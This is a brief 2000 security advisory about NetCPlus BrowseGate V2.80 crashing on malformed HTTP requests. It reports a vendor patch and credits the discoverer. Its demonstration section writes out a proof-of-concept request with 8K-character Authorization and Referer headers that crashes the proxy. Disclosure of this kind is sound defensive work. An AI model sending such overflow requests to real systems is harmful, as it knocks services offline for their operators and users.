Reported September 20, 2000 by Delphis

VERSIONS AFFECTED
  • NetCPlus BrowseGate (Home) V2.80 (H)

DESCRIPTION

It is possible for a malicious attacker to remotely cause Browsegate to crash with invalid memory errors.

DEMONSTRATION

An attacker could telnet to port 80, the listening port of Browsegate's HTTP Proxy, and send the following commands;

GET / HTTP/1.0
Authorization:     Basic (A x 8k)
From:     hacker@malicious.ca
If-Modified-Since:     Sat, 29 Oct 1994 19:43:31 GMT
Referer:     http://www.windowsitsecurity.com/ (A x 8K)
UserAgent:     Malicious Browser 1.0

This will cause brwgate.exe to crash with it's own error handler.  Please note that "(A x 8k)" denotes 8K of characters and "" is a carriage return.

VENDOR RESPONSE

According to Delphis, NetCPlus has promptly fixed this issue and issued a patch available from their website.

CREDIT
Discovered by
Delphis